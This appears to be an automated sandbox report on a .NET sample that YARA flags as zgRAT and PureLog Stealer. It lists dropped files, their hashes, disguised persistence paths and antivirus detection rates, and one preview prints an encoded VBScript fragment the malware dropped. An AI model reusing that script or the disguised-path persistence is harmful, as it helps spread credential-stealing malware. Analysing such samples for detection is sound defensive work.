                                                                                          SHA-256:2B0DD6E234888B977AEF8E35CF81753F099E3A55A12FA1479BF7BDF04C2BE245
                                                                                          SHA-512:07D2F6E3E9370A43CA6AAE2D996426FD20646788C231AE4B457CB37FF23BAD61EE1554E3F4896F86B11922AC3BA83D8E798258E9919EADB8E1A106C90B328B3F
                                                                                          Malicious:false
                                                                                          Preview:0kgAgmpSRRUbasfIKS2QSOVszNma5Y5z6kne0v6usJvN1BWNMLUuoIAmPxKSAPX2Vee0EASZWIiIdH1x1YOuEKKyjBPCknucw22WhfJL25Ygj2JI6WblAmyKUpRCvQytXFVkPePVPC2JwoOq2GFNLIbKErC2NHalGpIdgi2cGFW8uoYqalJoKlhPoLfibXIHlQDGfvKTNmGFwdZZSWbm7waeH3zUDUBt7OXelRKpazaifccKwGPF5fKzzi9l5zQ2lXHhG4xALwLHV29paoi7F5xbEhpDSjtljh6IU5E1SO3JUCd6jTLQQTxpjpdiPusm
                                                                                          Process:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Process:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):220
                                                                                          Entropy (8bit):5.79407042376443
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Gh0wqK+NkLzWbH9WF08nZNDd3RL1wQJRifqRYFxOD7s:GhFMCzWL74d3XBJUqRYSD7s
                                                                                          MD5:ACEC86DE9EE42984E4115B8178F86968
                                                                                          SHA1:8E885B0A0E4569924E902630AFF64A26C2D45D3B
                                                                                          SHA-256:C0BC9DC1AE97215FB3E4259D7B445E685AFE25D7911B66FF382E46AE523B9340
                                                                                          SHA-512:0C4C8EAE4F2A8A8EC9BA76F4B53A35CE29F290D637E58B3C551782064BECCB6C793E31FB6DEEA9D734DA0A254F2865BF460FA7F3D0F0FB4F50A59B17948B74FE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Preview:#@~^wwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZ4mk.4DKhknDg+OzJsdUS:v2eoUm*UHK\UG2VPmJtZ04R(CYr~~TBP0Csk+4z0AAA==^#~@.
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (390), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):390
                                                                                          Entropy (8bit):5.864368485378418
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:oQWQkn4IjgRYqdpML7dnOKZj/527XaDFb0wtzP0Wsk2rCWmTzt/hgtnlr66hn:oUknSRYjL7dnUXaDFb0WzMTpr9kWJ
                                                                                          MD5:2CA3638B6B50DE3B74A3B352495FF3C2
                                                                                          SHA1:1B3716B612A4E87D67AE0E2EAE0325FC222CDC23
                                                                                          SHA-256:03A7656172B7A42AE88581403723BE4314024174010BC35ADDD051071A224102
                                                                                          SHA-512:181A819514A6BC3C172D87D8F483A8F03155DF0526D0B952DF3AAA8FF05D57D5197AFE469BA5839CCE62E6497CE7E935670212BC216AC3D4BA7F3BCEC675006C
                                                                                          Malicious:false
                                                                                          Preview:O653PN5J6jh5NGyXI4WQjEZQGjaLay14Pe4LXazBgMbWEgDAcUVtg0yKgoxqxusIrmqtLnArEVtXmCMjgatFdIYYptosmJOwdSpb0TyyUnoLGbhecOKXAmpiORDb8RE4H74TWutMl4vzdNSOMJQY90v0nHMiPW0CiuDIhNHrf7vF1zEB9zPzBq5QMDqPhK7OEtRtJKr8Cj2CEp9xDLjaGAB2yx6dh2JUAhBIiU2yHRwbx3LgE2LWlgHDrY5VNOaKZhCho0PsTuTzOjE5maYoqxtdZ7aJZgk30mCP1n1NndC0NSzIU9txzwelyiHqaFTwJa8mhyE8iLBMv3QHISzZxxDEHbbSgLxiKQqxUMlf5uPovR05SAiHP38WW3eFWvcXXcCfMc
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (859), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):859
                                                                                          Entropy (8bit):5.91486477446124
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:SBx968ea3Tmidt42iI7Q6wz4IXlFFIOUqO0h:SH96/ajmidi2iI2z4IX7FTUT0h
                                                                                          MD5:38E68926D22458E2AA9D37E72CFD3877
                                                                                          SHA1:2E2A595B17A0FD5EEF206941BFBF77FEF6DADE58
                                                                                          SHA-256:B8D29FF4F06BED1CF76D62FB4C7E8D0AF0CA6DAD31E270F980C34560967AF846
                                                                                          SHA-512:27CD7BB5DAD83710FD3ED1E0FF89851E730901F2E064FB13E7E0A55689D1A73ABAB8DEA9071AD73F1D2AEEF95BEB979BF34592037B027F2EEAB4E28D8CA18CDA
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):425
                                                                                          Entropy (8bit):5.823068388891013
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:MoUi8a6j2ziWsxSGauR11t4flh4cSsZI+spp9nNbCLGMO:MnyGUsAlHwp9NbCLg
                                                                                          MD5:F13C6F7C6F85B5FA6EEE6574A35DAA41
                                                                                          SHA1:8CF9B489C25C785EBF2D1708D9A433B820DE220F
                                                                                          SHA-256:EAB3961C26091BDD067DC96507473FB22DF3EB2497A3542D47A4800008C85310
                                                                                          SHA-512:31CD532CEBF9E267446319463DE5AC587FC9C3443CD6A00AE368D5BE1AFBDD60F827DFBB5F36A9591DFDE2D78BD252A589177BC91846C2381354CBCA10C392B9
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Process:C:\Recovery\Memory Compression.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):847
                                                                                          Entropy (8bit):5.354334472896228
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                          Process:C:\Users\Default\Videos\System.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):847
                                                                                          Entropy (8bit):5.354334472896228
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                          Process:C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):847
                                                                                          Entropy (8bit):5.354334472896228
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1915
                                                                                          Entropy (8bit):5.363869398054153
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                          MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                          SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                          SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                          SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):19253
                                                                                          Entropy (8bit):5.005753878328145
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                          MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                          SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                          SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                          SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                          Malicious:false
                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllultnxj:NllU
                                                                                          MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                          SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                          SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                          SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
